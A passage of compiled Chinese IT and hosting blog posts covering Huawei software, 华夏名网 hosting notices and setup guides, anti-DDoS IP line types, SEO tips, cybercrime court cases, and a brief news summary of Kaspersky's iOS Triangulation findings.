邓泰华表示,华为将坚持「硬件开放、软件开源、使能伙伴、发展人才」的生态策略。在基础软件方面,欧拉首个数字基础设施全场景版本 openEuler22.03LTS 今年3月发布。欧拉南向支持多样性设备,已经实现主流计算架构100% 全覆盖,包括 ARM、x86、RISC-V 等全部主流 CPU 指令集,同时支持 NPU、GPU 和 DPU 等多种异构算力;欧拉北向使能 IT、CT 和 OT 全场景应用,与伙伴协作,适配一万多款应用,主流应用场景100% 支持。同时,通过共享分布式套件,进一步实现与鸿蒙互通。 对于自研编程语言仓颉的进展,邓泰华表示,华为在编程语言领域还在持续提升自主创新,华为要打造根技术,从操作系统、数据库、芯片、编译器、编程语言、指令集,这些都属于根。「编程语言包括底层的编程语言,计划在今年下半年发布,支持多样性算力。仓颉是对应到上层应用编程语言,我们现在也在编程语言的开发过程当中,后面合适的时机还会再做正式的发布。」他说。 #### 华为超融合HCI全球市场份额位居前三 成唯一上榜的中国厂商 近日,IDC发布了最新的2020年第4季度全球融合系统行业追踪报告,其中超融合系统收入同比增长7.4%,达到25亿美元,占到整个融合系统行业的54.2%~!在疫情影响全球经济情况下,还能取得如此增长率,足见市场对超融合系统的青睐,IDC分析师如此评价道:“超融合系统的销售是市场在20年第四季度的主要增长点,同比增长7.4%,这比我们过去几个季度所看到的要快。中国,欧洲,中东和非洲地区在2020年第四季度实现了两位数的增长。”从全球超融合系统收入(包含HCI硬件,HCI软件和系统基础结构软件的价值)排名来看,VMware独占鳌头,Nutanix和华为紧随其后,排名分列二、三位,其中华为同比迎来高达75%的增长。超融合即HCI(Hyper Converged Infrastructure),是一种将计算、存储、网络和虚拟化功能进行全栈融合的技术架构,可以帮助客户从原本孤立的、固化的、陈旧的IT系统中解放出来,提供极简数据中心,为业务持续演进打下了坚实的基础。作为此次唯一上榜的中国厂商,华为继续延续其在超融合市场的良好势头,同时在Forrester Wave报告中华为超融合被定义为全球强劲表现者,并且连续三年在中国区市场份额排名第一。去年华为FusionCube超融合100%中标中国移动集采,充分展示了其综合实力,并在金融、制造、运营商、医疗等行业有大量成功案例,例如中国银联、光大银行、三一重工、一汽集团、广东移动、深圳大学、广东省第二人民医院、山西煤矿等都是其重要客户。 #### 华军软件园等464家网站平台被查 涉侵权假冒、色情低俗与赌博 一季度,江苏网信系统按照国家网信办统一部署,持续开展涉软色情、有偿删帖、移动应用程序“刷榜”、“江湖骗子”等专项整治,强化多部门联合执法,切实加强网络生态治理,依法打击网上各类违法违规行为,有效遏制有害信息反弹、反复势头,持续为青少年营造清朗网络空间。 江苏省市网信办依法依规对“旅通在线”“邳州论坛”“华军软件园”等85家违规网站平台、账号进行约谈、警示、整改。会同省通信管理部门依法关闭、注销“南京林鑫再生资源有限公司”“六道成长神器”“AG真人试玩”等侵权假冒、淫秽色情低俗和赌博类网站平台464家。属地应用商店依法下架“对话吧”“忘忧草”等违法违规移动应用程序274款;有关网站平台依照用户服务协议关闭各类违法违规账号2111个。移送司法机关相关线索265件。 省互联网违法和有害不良信息举报中心共受理涉我省属地网站平台有效举报6776件,主要为侵权类、赌博类、色情类和诈骗类等有害信息,均已转交相关部门依法查处。 全省网信系统将持续加大查打力度,依法开展督查检查,压紧压实网站平台主体责任,有效净化网络生态。 #### 华夏名网四川电信机房转入河南BGP多线机房通知 尊敬的用户: 因四川电信机房网络线路调整,线路互联互通不太理想,为保障用户产品质量和提升用户体验,经再三考虑,我司决定将四川电信机房业务并入河南BGP多线机房,具体如下: 1.将于2018年1月17日16:00暂停四川电信机房服务(主要涉及产品:四川电信虚拟主机/VPS),迁入河南BGP多线机房。期间网络会中断,为此给您带来不便敬请谅解。 2.云主机四川电信节点将于2018年1月17日下线,电信节点带宽将并入河南BGP线路,请修改解析到河南IP上,为此给您带来不便敬请谅解。 华夏名网 2018年1月16日   河南BGP多线机房介绍: 1.机房规格:河南BGP多线机房按照T3+国际标准投建,是河南更高标准的BGP多线机房。防静电地板高度0.6米,三级防尘,压力为14帕。通过自然冷却和下送风、冷热区分离的气流管理设计,机房全年综合节能30%,综合PUE值达到1.45。全年连通率99.98%。 2.资源量:通过BGP与联通、电信、移动、铁通互联,机房带宽出口200G,自动清洗3G以下DDOS、CC攻击,26万个IP地址存量,机架1100个,机柜单路电量16A。 3.技术服务:152名高级工程师,提供基于服务器硬件、操作系统、网络、应用环境、安全5方面的免费技术支持,服务项多达42个。通过工单系统/400呼叫中心/在线客服,您的需求工程师30分钟内响应,一个工单轻松解决服务器问题。 4.机房特色:带宽出口大,清洗异常流量能力强。超大的ip地址存量和机柜资源,适合云计算业务扩展。支持ipv4+ipv6双栈运行,T3+标准机房为金融、电商、ERP、OA、App、提供更好托管环境。 #### 华夏名网域名如何解析 最近遇到很多不懂怎么域名解析的朋友,老实说如果让主机吧一个一个的教的话有点麻烦,而且也没这么多时间,慢慢教也不知道从而说起。所以特地写了这篇教学,希望可以大家可以看得明白。 首先我们进入网站会员中心,我的域名   找到要解析的域名,点管理(解析) 域名指向设置,点击编辑 添加记录,主机名写www,类型A  线路默认   记录值写你要解析的服务器IP 这样就解析完成了。   注意: 主机名是指前域名的前缀,比如我要设置zhujib.com 那么主机名就写www,同理,如果我要设置m.zhujib.com,那么主机名就写m,如果没有前缀就写@,那就是设置zhujib.com 类型A记录是指 IP解析 也就是解析记录值是IP,CNAME类型是指别名解析,很多空间商是不提供直接IP的,都是提供一个类似域名的别名解析记录,那样的话我们就选CNAME类型,然后记录值就填空间商提供的别名解析地址     #### 华夏名网域名如何过户 很多域名商过户都很容易,比如阿里云、西部数码,过户都是手机验证和邮箱验证就可以了。但华夏名网过户就有些麻烦,需要填写表格,上传资料。所以买华夏名网的域名的时候注册所有者一定要填好,以免得过户麻烦。今天我们来说说华夏名网域名是如何过户的。 首先进入会员中心 左边导航-我的域名 找到要过户域名,进入管理(解析) 进入管理后,找到过户申请,点击 然后按要求上传新所有者资料和原所有者资料,还有申请表等   需要注意的是域名过户申请表必须打印手写签字。 如果您有原域名所有者的资料可以不用上传声明书 如果没有原域名所有者资料,请务必填写声明书上传。原域名所有者的所有资料直接用新所有者资料代替。 上传完后直接点提交,等华夏名网那边审核过后,再支付费用即可,域名过户费用20元一次。 #### 华夏名网备案系统更换通知 尊敬的用户: 您好!因工信部备案系统升级,2018年3月28日起,华夏名网上线启用新的备案系统,原备案系统将暂停备案服务,仅用于原有资料查询。 成都飞数科技有限公司备案系统:http://icp.sudu.cn (新备案系统) 惠州市雄飚网络技术有限公司备案系统:http://icp2.sudu.cn/ (仅用于之前在广东、天津、吉林备案成功后需要操作备案注销、变更。) 老的备案系统:http://www.icpbeian.org/ 若您有任何问题,欢迎您及时拨打我司备案热线400-998-1766转3。 非常感谢您对华夏名网的配合和支持,祝您工作愉快! #### 华夏名网备案背景幕布电子版 华夏名网备案挺麻烦的,要求专用背景照片,必须印有成都飞数科技有取公司字样,如果在官网买背景幕布的话,价格挺贵的,据主机吧了解到,50块钱包邮。 所以为了省钱一般我们都是自己拿电子版的背景图,然后拿去给人家喷就行了,一般的印刷就十几块钱,大型打字复印店、广告制作店都是有这种服务的。如果你在当地找不到也可以淘宝搜,让别的城市代刷,价格也是十几二十块这样。 把电子样版发给店家打印就行,华夏名网备案背景图如下: 打印要求字不能太大也不能太小,按 1.2* 1 米 的规格打就行。 #### 华夏名网虚拟主机MySQL/MSSQL数据库导入的方法 华夏名网的虚拟主机控制面板真很强大,很多操作非常方便,就比如数据库导入,导出。很多用习惯了华夏名网控制面板的用户都不习惯改其它服务商了。这也是华夏名网的优势之一。虽然很多功能大家都会用,不过也有些新手站长不会用的,今天主机吧来给大家说下华夏名网虚拟主机数据库的导入方法: 一、进入我的主机、管理数据库   二、点开导入功能,可以看到要求把数据库文件传到/__bak__/mysql/backup 目录上,如果是MSSQL数据库的话,路径应该是/__bak__/mssql/backup 三、然后我们登陆FTP空间,把数据库文件传到/__bak__/mysql/backup 目录上 四、 进入数据库导入功能,刷新并导入即可完成数据库导入,就是这么简单! #### 华夏名网虚拟主机如何绑定域名 说起华夏名网,很多人站长都知道,老品牌,产品线非常全,各型虚拟主机、VPS、云服务器都有。非常受站长欢迎。 华夏名网自主研发的虚拟主机控制面板非常好,是主机吧用过最好的虚拟主机控制面板,不过还是有很多新手站长不懂得如果绑定域名,这里主机吧教大家如何绑定虚拟主机。   进入虚拟主机控制面板 域名绑定功能   增加主域名,输入自己的主域名,比如主机吧的用 zhujib.com   增加主域名成功后,再点添加绑定 子域名框输入www,比如我要绑定的域名是zhujib.com,那么子域名框就输入www, 然后选择要绑定的主域名,最后选择添加即可。 添加域名绑定成功后,就会显示要解析的别名记录,然后直接到域名解析相应的别名记录即可。     #### 华夏名网:值得推荐的虚拟主机服务商 很久之前就一直想写一篇自己对华夏名网的见解,不过一直没时间,主机吧很久2011年前就代理华夏名网了,那时候万网还在,还没有被阿里云合并,腾讯云百度云这些也没开始,大概是云概念那时候还没在国内流行起来的原因吧。国内做网站的人非常多,基本都是用虚拟主机、VPS主机。华夏名网、西部数码、还有万网的用户非常多,主机吧也是那时候看到有利可图就代理了这三家公司的产品来卖。 今天主要讲华夏名网,主机吧代理的那时候华夏名网已经很出名了,因为华夏名网的虚拟主机性价比非常高,1G空间2G数据库一年价格也就200块左右。而且速度稳定性可以说非常好。所以找主机吧买的人很多,最高峰的时候一天十几个人来买,而且续费率也很高,有些用了觉得好的都是介绍朋友来买。那时候会用VPS的人很少,所以基本都消费虚拟主机,就这样这边一年也消费十几万。可见那时候华夏名网的虚拟主机有多受欢迎。 华夏名网的虚拟主机性价比高,不过晚上11点后就没有技术处理问题了。但如果是正常上班时间的话处理问题速度还是挺快的,一般10分钟左右处理。这个相比一家打着7天24小时的空间商,实际上周末还有晚上没有人在线的服务商好得多。 华夏名网的虚拟主机控制面板是自主研发的,非常好用,功能也很给力。跟一些用第三方控制面板的服务商不一样,华夏名网在控制面板方面改进得非常好,这几年也一直在不断加强。一般有什么问题官方技术都可以解决,而不像有些服务商,根本没有解决自身问题的能力。 华夏名网虚拟主机最有特色的地方是支持免费换服务器,这点很多空间商做不到,很多空间商的虚拟主机都是越用越慢,还不支持换服务器,而华夏名网的完全没有这个问题。而且还支持更换线路,像广东、四川、河南、香港、美国线路这些都支持更换。 说完华夏名网的优点,我们来说下缺点吧,作华夏名网的代理商,主机吧深深体会到华夏名网在渐渐没落,应该说国内IDC行业的竞争正在由百化齐放,变成BAT(百度、阿里云、腾讯)的独角戏,尤其是阿里云,几乎占据半壁江山。各种免费半年云服务器,阿里云更是推免费虚拟主机。导致很多站长都纷纷转投阿里云,云服务本来就是烧钱行业,阿里云背靠阿里爸爸,根本不缺钱,所以华夏名网跟阿里云无论是技术还是稳定性根本没法比(售后还是华夏名网好些的),所以这几年华夏名网基本处在吃老本的路上。 当然华夏名网并不会倒闭,毕竟华夏名网几十万用户摆在那。不过也可能会走上靠拢阿里云的行列,现在很多IDC公司都把自己的服务器转投阿里云机房了,这样的好处是可以享用阿里云机房的速度和稳定性,坏处是维护困难,而且利润都让阿里云赚走了。希望华夏名网不会走这样的路吧,走自己的路才是王道。 #### 单线与多线高防IP区别解析 线路/速度/成本全面对比 单线高防IP和BGP多线高防IP的核心区别在于网络线路的质量、覆盖范围、访问速度、稳定性和成本。它们都是为了提供强大的DDoS防护能力,但面向的用户群体和解决的核心痛点不同。 以下是两者的主要区别: 网络线路(核心区别) 单线高防IP: 通常指只接入单一骨干网络运营商(如中国电信、中国联通、中国移动之一)的线路。 用户访问时,如果用户的网络运营商与高防IP所在的运营商一致(例如都是电信用户访问电信单线高防),则速度较快、延迟低。 如果用户的网络运营商与高防IP所在的运营商不一致(例如联通用户访问电信单线高防),则数据需要经过运营商之间的互联互通点进行跨网传输。这会导致: 延迟显著增加: 数据绕路,路径变长。 丢包率可能升高: 互联互通点可能拥塞。 访问速度慢、体验差: 尤其对于实时性要求高的应用(游戏、视频会议、金融交易)影响巨大。 BGP多线高防IP: 机房同时接入多家(通常是三大或更多)骨干网络运营商(电信、联通、移动等)。 利用边界网关协议,智能地自动选择最优访问路径。 无论用户使用哪家运营商的网络访问,BGP协议都能将用户的请求引导到离他最近、速度最快的同运营商线路入口。 效果: 实现真正的“单IP,多线路,全网访问快”。电信用户走电信入口,联通用户走联通入口,移动用户走移动入口,极大减少了跨网访问,显著降低了延迟和丢包,提升了访问速度和稳定性。 访问质量与用户体验 单线高防IP: 对同运营商用户:体验好。 对异运营商用户:体验差(卡顿、延迟高、丢包),可能导致用户流失。 BGP多线高防IP: 对所有主流运营商用户都能提供优质、稳定、低延迟的访问体验。用户体验一致性高,尤其适合面向全国甚至全球用户的服务。 高防能力(清洗能力) 基础防护能力: 两者在基础的DDoS防护能力(如防御流量大小、包转发率PPS)上,主要取决于服务商提供的套餐规格和机房基础设施能力,与单线还是BGP没有必然的绝对优劣之分。都可以提供Tbps级别的防御能力。 清洗节点分布(潜在影响): 真正的BGP多线高防通常意味着服务商在多个运营商网络内部署了清洗节点。当攻击发生时,流量在更靠近攻击源或用户源的运营商网络内部就被清洗掉,再将干净流量通过最优路径(同运营商)回源到你的服务器。这可能在处理特定类型的攻击(尤其是针对特定运营商用户的攻击)时效率更高、影响更小。 单线高防的清洗节点通常只在该单线运营商网络内部。异运营商流量需要先跨网汇聚到清洗节点,清洗后再跨网回源,路径可能不是最优。 成本 单线高防IP: 成本相对较低。因为只需要接入和维护单一运营商的线路和带宽资源。 BGP多线高防IP: 成本显著高于单线。因为需要支付多家运营商的带宽和线路费用,BGP广播和路由管理也更为复杂,技术门槛和运营成本更高。 适用场景 单线高防IP: 业务用户高度集中在某一特定运营商(例如,主要用户都在南方电信)。 对访问速度和延迟要求不高的业务(例如某些后台管理、低频访问的内部系统)。 预算非常有限,且能接受异运营商用户体验较差的情况。 BGP多线高防IP: 业务面向全国或全球用户,用户分布在不同的运营商网络。 对访问速度、延迟、稳定性要求极高的业务(例如:在线游戏、直播、视频会议、金融交易、电商、大型门户网站、SaaS服务等)。 追求所有用户一致的良好体验。 预算相对充足。 总结对比表: 特性单线高防IPBGP多线高防IP核心线路单运营商(电信/联通/移动之一)多运营商融合(电信+联通+移动+…)访问原理依赖运营商互联互通BGP智能路由,自动选最优同运营商路径同运营商用户体验优优异运营商用户体验差(延迟高、丢包、卡顿)优(延迟低、稳定、速度快)访问质量一致性不一致高度一致基础防护能力取决于套餐规格取决于套餐规格清洗节点分布(潜在优势)通常在单线网络内通常在多线网络内,清洗路径可能更优成本较低较高典型适用场景用户高度集中单一运营商、对体验要求不高、预算有限全国/全球用户、对体验要求高(游戏/直播/金融/电商等)、追求一致体验 简单来说: 你需要的是便宜且用户基本都在同一家运营商?选单线高防IP。 你需要的是所有用户(无论用什么网络)都访问快、不卡顿、体验好?选BGP多线高防IP。这是目前绝大多数对用户体验有要求的商业网站和应用的首选方案。 选择建议: 分析你的用户群体: 你的用户主要分布在哪些运营商?是全国均匀分布还是集中在某个区域/运营商? 评估业务需求: 你的业务对网络延迟、稳定性有多敏感?用户体验差会带来多大损失(如用户流失、交易失败)? 考虑预算: BGP多线的成本你是否能承受? 验证“真BGP”: 选择服务商时,务必通过工具(如多地Ping、Traceroute)测试其提供的IP是否真的实现了各运营商低延迟访问,谨防虚假宣传的“假BGP”或普通多线(非智能选路)。真正的BGP IP在各大运营商测试点ping值都应该很低且稳定。 对于绝大多数面向公众的互联网业务,尤其是在中国复杂的网络环境下,BGP多线高防IP是保障良好用户体验和业务稳定的更优选择,尽管它的成本更高。单线高防IP则适用于非常特定的、预算有限且对异网用户容忍度高的场景。 #### 单页如何快速获得百度排名 偶尔发现的这个快速排名办法,下面详解: 一、 背景: 网站名称:浪起激光 网站表现:企业站 , 权重3 , 收录1000+ ,域名时间 9年。 程序:zblog 页面:伪静态处理:域名/分类/id.html 单页面:伪静态处理:域名/pinyin.html TAG:这个是重点,相信站长都会使用这种聚合标签;域名/pinyin.html 更新:日常更新,偶尔原创,大部分伪原创(不是伪原创软件生产) 内链:主关键词链接到首页,长尾词多链接到tag 二、 过程: 由于网站属于企业站,且行业涉及较窄,所以tag标签并不多,共计20以内,且选择的标签都是长尾词。之前发文章懒,没添加tag,后来布局长尾词时考虑到必要性,才添加了标签。周期约1年时间,发现tag聚合页面排名不是很好,都在后3页。。。。 后期感觉这种聚合页面都是以列表形式展现的,就挑了两个指数比较高的,换成详情页,因为详情页更能展现内容且很(将标签删掉,新建页面,url采用标签页面的url,) 三、 结果: 结果很惊讶,这个新建的页面,在两天内冲到了百度首页,并且排名稳定。 以上图中的页面关键词:光纤激光打标机,为例,到目前已经稳定百度首页一个月。 四、 总结: 1、 首先要有tag 2、 并且给它添加了内链(文章中出现该词自动内链) 3、 养它一段时间 4、 和我一样,换成详情页 Ps:本人不是seoer,此方法只是偶然发现,希望能够帮助到大家,seo是一项复杂的工作,希望大家劳逸结合,不要过多陪伴电脑,注意身体! 作者/来源:浪起激光 #### 卖《绝地求生》游戏外挂被判刑,其中一人只仅获利 6694 元 据京山法院消息,近日,京山市人民法院依法审结了一起“游戏外挂”案件。 5 人为获取非法利益,共同制作、售卖《绝地求生》游戏外挂程序,获利达 500 多万元。法院以提供侵入、非法控制计算机信息系统程序、工具罪,分别判处五人有期徒刑六个月到三年不等,缓刑一年至五年不等,并处罚金 6000 元至 16 万元。 截止至本案案发,5 人中的周某宇获利 2044924 元、黄某赛获利 2357681 元、程某君获利 460750 元、杨某获利 814897.24 元、黄某蔚获利 6694 元。 5 人为获取非法利益,共同制作、售卖能侵入、控制计算机信息系统的外挂程序,其行为均已触犯了《中华人民共和国刑法》第二百八十五条第三款,应当以提供侵入、非法控制计算机信息系统程序、工具罪追究其刑事责任,法院遂作出以上判决。 #### 卖域名做黑产被抓 这几年网站建设环境并不好,很多站长都把网站卖了,但是其实网站卖站是有风险的,在明知对方拿来做黑的情况下,还卖给对方的是要负责的。最近,有一个以卖域名给境外非法组织为生的公司就中招了。 从云南省公安厅新闻办公室获悉,云南公安机关成功破获全国首例域名黑产犯罪案件。这一案件是在全国各地公安机关支持配合共同奋战下侦破的,抓获涉案人员630人,查封用于黄、赌、诈等违法网站域名50余万个。 该案线索始于2021年5月13日,云南省昆明市公安机关当天成功捣毁了2个为境外“黄赌诈”网站及APP提供“域名防封堵”服务的网络黑产犯罪团伙,查明其共为2400余个境外“黄赌诈”网站提供“域名防封”技术服务非法牟利的犯罪事实,就此一条网络黑灰产业被“起底揭盖”。 经深入调查,民警发现为两个犯罪团伙提供的域名全部来自云南省外某网络科技公司。案件情况上报后,引起公安部高度重视,将该案列为公安部督办案件,要求云南组织精干力量开展专案攻坚,查清该公司违法犯罪事实,摸清域名类犯罪活动生态。 2021年11月1日,云南专案组赴省外在各地公安机关的配合支持下,对该网络科技公司开展收网工作。抓获以李某某、怀某某等为首的犯罪嫌疑人29人,查获非法销售域名400余万个、被用于违法违规网站94万个(其中近90万个涉及黄、赌、诈违法犯罪网站),帮助解封违法违规域名2.4万个,查、冻涉案资金200余万元。 经查,该网络科技公司作为国内域名注册服务代理商,未履行监管职责和义务,违规销售未实名注册的域名,并将未变更的备案域名高价出售给他人搭建违法犯罪网站,还为违法犯罪人员提供“域名防封”服务,导致违法犯罪网站、APP屡禁不止,严重危害网络安全秩序和民众财产安全。 2022年3月25日,公安部迅速对全国公安机关作出安排部署,在云南省公安厅成立分指挥部,对上述案件涉及域名黑产的犯罪线索发动全国集群战役。云南密切联合27个省市公安机关连续奋战,共侦破案件300起,抓获涉案人员630人,查封用于黄、赌、诈等违法网站域名50余万个,查获境内外公民个人信息450余万条,查封仿冒网站4000余个。 #### 卖百度文库破解被百度起诉了 7月30日 消息:今日,百度与苏州梦西游网络科技有限公司不正当竞争纠纷一审民事判决书被公开。 原告百度诉称,梦西游公司通过天猫网中的店铺“梦西游网络科技”违法向用户提供百度文库需用下载券下载的文档(以下简称用券文档)和付费文档的下载服务,即用户通过使用梦西游公司提供的插件,可以下载并浏览百度文库中的用券文档和付费文档。百度公司认为,梦西游公司未经许可,以营利为目的,通过技术手段违法提供百度文库相关文档的下载服务,直接导致百度文库用户数量的减少和浏览量的降低,妨碍、破坏了百度公司合法提供的网络产品的正常运行,构成不正当竞争。 对此,百度请求法院判决梦西游公司在天猫网站显著位置连续三十日刊登声明、消除影响。赔偿百度公司经济损失295万元及合理开支5万元(即律师费)。 经审理后,法院认为,梦西游公司实施的被诉行为使用户无需上传和分享文档,直接影响了百度文库通过非VIP用户上传文档获取文档资源这一重要渠道,破坏了百度公司的经营基础。梦西游公司通过涉案插件这一技术手段,打破了百度公司对用户下载文档设置的相关限制,使服务购买者无需遵循百度文库产品在文档下载方面的运营规则,即可无差别地获得相关文档,破坏了百度文库产品和服务的正常运行。另外,用券文档还可以通过购买VIP会员服务免费获得,而被诉行为亦影响了用户购买百度文库会员的积极性;且梦西游公司基于其价格优势,也极有可能使百度文库的已有VIP用户不再继续购买VIP服务,从而直接造成百度公司会员收入的减少。 最终,法院判决,被告苏州梦西游网络科技有限公司自判决生效之日起十日内,赔偿原告北京百度网讯科技有限公司经济损失200万元及合理开支3万元等。 #### 南宁、青岛、昆明、海口也国际通信业务出入口了 月 10 日消息,综合“工信微报”、央视新闻消息,工业和信息化部今天向中国电信、中国移动、中国联通颁发许可,批复在广西南宁、山东青岛、云南昆明、海南海口设立 6 个国际通信业务出入口局。 这是 30 年来首次增设国际通信业务出入口局,建成后将显著提升国际网络通信能力,更好推动基础设施互联互通、数据跨境流动和国际数字贸易发展,促进更高水平开放,为构建新发展格局塑造新动能新优势。 我国 1994 年实现全功能接入国际互联网,三大运营商曾在北京、上海、广州设立 9 个国际通信业务出入口局。 国际通信业务出入口局,即国内运营商通信网络与境外运营商通信网络之间的互联节点,主要用于实现双方业务的互联互通和数据交换。 据工信部党组书记、部长金壮龙介绍,国际通信业务出入口局作为连通全球网络的国际通信枢纽,是我国对外交流的重要信息基础设施。要加快新设出入口局建设,以基础电信企业为责任主体,各地方政府、通信管理局等充分参与,形成工作合力。要赋能经济社会高质量发展,支撑电信业务开放、跨境数据流动、国际数字贸易等发展,推进信息化与工业化深度融合,积极服务地方外资引进和企业国际化发展。要加强出入口局安全运行,建立健全管理制度,进一步提升网络韧性和承载能力,强化网络与信息安全保障,确保设施运行稳定、网络质量良好。 #### 博客园要顶不住了,呼吁用户开通会员才能活下去 9月18日 消息:自2022年以来,中国知名技术博客网站博客园面临巨大生存危机。今年4月,博客园曾发出“绝境求商”的呼声,但随后几个月的时间里,博客园仅仅依靠用户捐助、天使投资和少量会员费用苦苦支撑。 现在,博客园的存亡已陷入绝境。博客园日前官方发文《弹尽粮绝,会员救园:会员上线,命悬一线》。 博客园团队在官方博客中透露,他们弹尽粮绝,没有能力在其他商业模式上进行尝试,能否熬过当前困境,完全取决于到年底前有多少用户选择成为付费会员。博客园的命运已“命悬一线”。 据悉,博客园诞生于2002年,迄今已有20年的历史。多年来,博客园积累了大量优质的IT技术文章和广泛的技术社区用户。如今濒临倒闭的危机让人扼腕。博客园表示,他们曾在政策压力下选择坚持,在收入暴跌下选择坚持,而如今用户的选择将决定这个老牌技术社区的生死存亡。 博客园号召用户开通付费会员以支持社区运营。他们将尽最大努力为会员开发更多权益。同时,也在公众号上发出呼吁,希望更多用户伸出援手,因为博客园的存在就是用户多年来的选择。 博客园团队表示,不管结果如何,他们都会坚持下去。 #### 博客大巴已挂,独立博客没落了吗 博客大巴成立于2004年,是国内最早一批第三方免费博客平台,后来走上了收费路线。因为模板自定义强,深受国人喜爱。然后这样的博客平台却关闭了,理由是被相关部门要求关闭了。 想想那个人人博客的年代,那时的博客平台真的火爆,像新浪博客、QQ空间,就连独立博客也是火得一塌糊涂糊涂。随着国内互联网监管越来越严,很多小博客平台都被迫关闭,是否真的博客没落呢? 主机吧不这么认为,虽然现在已经是移动网络时代了,但是随着自适应模板的开发,独立博客还是有非常大的市场。像卢松松博客就是个人博客的代表,每日流量轻松过万。很多人都觉得博客没落了,其实不然,现在很多公司都做自己的博客,比如百度安全,都是以博客形式发文。很多以前搞博客的人都去运营自媒体了,但这个是最笨的方法,第三方自媒体平台流量并不稳定,必须保持不断更新,而且内容审核也非常严。一但哪天你江郎才尽了,你会发现你根本从平台拿不到流量,还有第三方自媒体平台并不安全,哪天因政策原因关闭是也是常有的事。而且第三方自媒体流量变现是非常难的,不像自己博客只要内容质量好,被搜索引擎收录,流量会一直保持,而且内容自己想怎么写就怎么写,根本不需要审核。独立博客运营最重要的是把博客当品牌运营,让别人习惯每天看你写的东西,时间久了,别人一上网有时间就会访问你的博客。这样你就算是成功的博客了。 #### 博客如何起网站名字?博客网站起名的注意事项 最近,网站名称要求严格了起来,网站名称想当于人的名字,起得好坏非常用重,所以今天主机吧来教大家如何起个好的网站名称。 1.独一无二 记住,名字一定要独一无二,难听点都行,但是千万别跟人家同一个名称,尤其是大型网站,因为如果你要做网站认证的时候,名称和著名网站一样的话,是无法通过认证的,还有做SEO的时候,你的网站搜索永远排不过那些大网站,独一无二的网站名称才能让客户更容易找到你。 2.想好网站名称再备案 网站备案的时候,会要求你填写网站名称,这个一定要想好了网站名称再填写,因为备案写的名称代表着以后你就要用这个名称建站了,如果不一致会被通信管局注销备案的。 3.名称尽量与域名拼音一致 网站名称跟域名一致不仅可以让客户很容易记得你的域名,同时还非常有利于SEO。 4.起名称的技巧 如果你不是企业网站,千万别起个带行业词的名称,因为这样会让你备案通不过,而且如果你以后做了小程序,小程序名称认证也过不了。博客尽量起一些看不出行业的名称,可以减少很多不必要的麻烦。具体大家想象了。 #### 博客网站被搜索引擎收录方法 要让你的博客网站被搜索引擎收录,需要结合技术优化、内容质量和主动推广。以下是具体步骤和建议: 一、基础设置:让搜索引擎发现你的网站 提交网站到搜索引擎 Google:使用 Google Search Console,提交网站地图(Sitemap)和手动提交网址。 Bing:通过 Bing Webmaster Tools 提交。 百度:使用百度搜索资源平台提交(中文站必备)。 生成并提交Sitemap 使用工具(如XML-Sitemaps)生成网站的XML地图,确保包含所有重要页面。 将Sitemap上传到网站根目录(如 yourdomain.com/sitemap.xml),并通过搜索引擎工具提交。 检查robots.txt文件 确保 robots.txt 文件没有屏蔽搜索引擎爬虫(如 Disallow: / 会完全阻止收录)。 默认允许爬取的规则示例: User-agent: * Allow: / 二、内容优化:吸引搜索引擎收录 原创高质量内容 避免复制粘贴,提供独特见解或深度分析,搜索引擎偏爱原创且有价值的文章。 关键词优化 在标题、正文、URL和Meta描述中自然融入目标关键词(如“如何搭建个人博客”)。 使用工具(如Google Keyword Planner)挖掘长尾关键词。 优化标题和Meta标签 标题标签(Title Tag)控制在60字符内,包含核心关键词。 Meta描述(Meta Description)简洁明了,约150字符,吸引用户点击。 内部链接建设 在文章中添加相关内链(如“关于我”页面链接到“我的技术栈”),帮助爬虫发现更多页面。 三、技术优化:提升网站可抓取性 确保网站可访问 检查服务器稳定性,避免频繁宕机。 使用工具(如 Screaming Frog)扫描死链并修复。 加速页面加载 压缩图片(工具:TinyPNG),启用浏览器缓存,使用CDN(如Cloudflare)。 移动端适配 使用响应式设计,通过 Google Mobile-Friendly Test 检查兼容性。 结构化数据标记 使用Schema.org标记文章类型、作者、发布时间等,帮助搜索引擎理解内容。 四、推广与外部因素 获取外部链接(Backlinks) 通过优质内容吸引其他网站自然引用。 主动在相关论坛、社交媒体或友链交换平台推广。 社交媒体分享 在Twitter、LinkedIn、Reddit等平台分享文章链接,增加曝光。 提交到内容聚合平台 将文章同步到Medium、知乎专栏或Dev.to(附原文链接),引流回博客。 五、监测与调整 跟踪收录状态 在搜索引擎输入 site:yourdomain.com 查看已收录页面。 通过Google Search Console的“覆盖率报告”检查未收录原因(如404错误)。 定期更新内容 保持至少每周更新,活跃的网站更容易被频繁抓取。 常见问题排查 页面未被收录?检查robots.txt、服务器日志(看爬虫是否访问)、页面是否有重复内容或低质量内容。 收录慢?增加外链、主动提交新文章URL到搜索引擎,或使用Instant Indexing API(需技术基础)。 通过以上步骤,通常1-4周内搜索引擎会开始收录。关键是持续提供价值,保持技术稳定,并主动推广你的内容。 #### 卡巴斯基公布苹果 Triangulation 漏洞事件分析报告 卡巴斯基实验室在2023年6月发现了苹果iOS设备中存在的Triangulation漏洞,该漏洞允许黑客向受害者发送特定的iMessage文件进行远程代码攻击。然而,卡巴斯基出于“安全要求”并未公开漏洞细节。 现在,卡巴斯基已经正式公开了这项Triangulation漏洞的调查报告。据报告,Triangulation漏洞主要由4项零日漏洞构成: FontParser 漏洞 CVE-2023-41990 整数溢出漏洞 CVE-2023-32434 内存页面保护功能漏洞 CVE-2023-38606 WebKit 漏洞 CVE-2023-32435。 卡巴斯基声称,在2019年就有黑客尝试利用Triangulation漏洞发起攻击,到了iOS 16后相关漏洞甚至遭到黑客滥用。卡巴斯基选择在今年6月披露漏洞细节,之后苹果公司才进行修复,这意味着“黑客团队早已多次利用相关漏洞发起攻击”。 黑客主要利用CVE-2023-41990漏洞发送恶意iMessage文件,从而在受害者设备上运行一项使用JavaScript编写的“权限获取工具”,之后利用CVE-2023-32434漏洞获取内存读写权限,再使用CVE-2023-38606漏洞绕过苹果的内存页面保护功能(Page Protection Layer),之后便能完全控制受害者的设备。在此之后,黑客利用WebKit中的CVE-2023-32435漏洞清理痕迹,并重复通过先前的漏洞来加载各种恶意程序。 卡巴斯基认为,这是研究团队所见过的“最复杂的攻击链”,黑客巧妙利用了苹果芯片中的硬件机制漏洞,从而成功执行相关攻击,这足以证明即使设备软件拥有所谓各种先进加密保护机制,但若硬件机制中存在漏洞,便容易被黑客入侵。 #### 卢松松博客被DDOS攻击打惨了 卢松松博客作为站长界的知名网站,主机吧之前是每天都有访问的,因为一些一手消息往往都是这里发出来的。 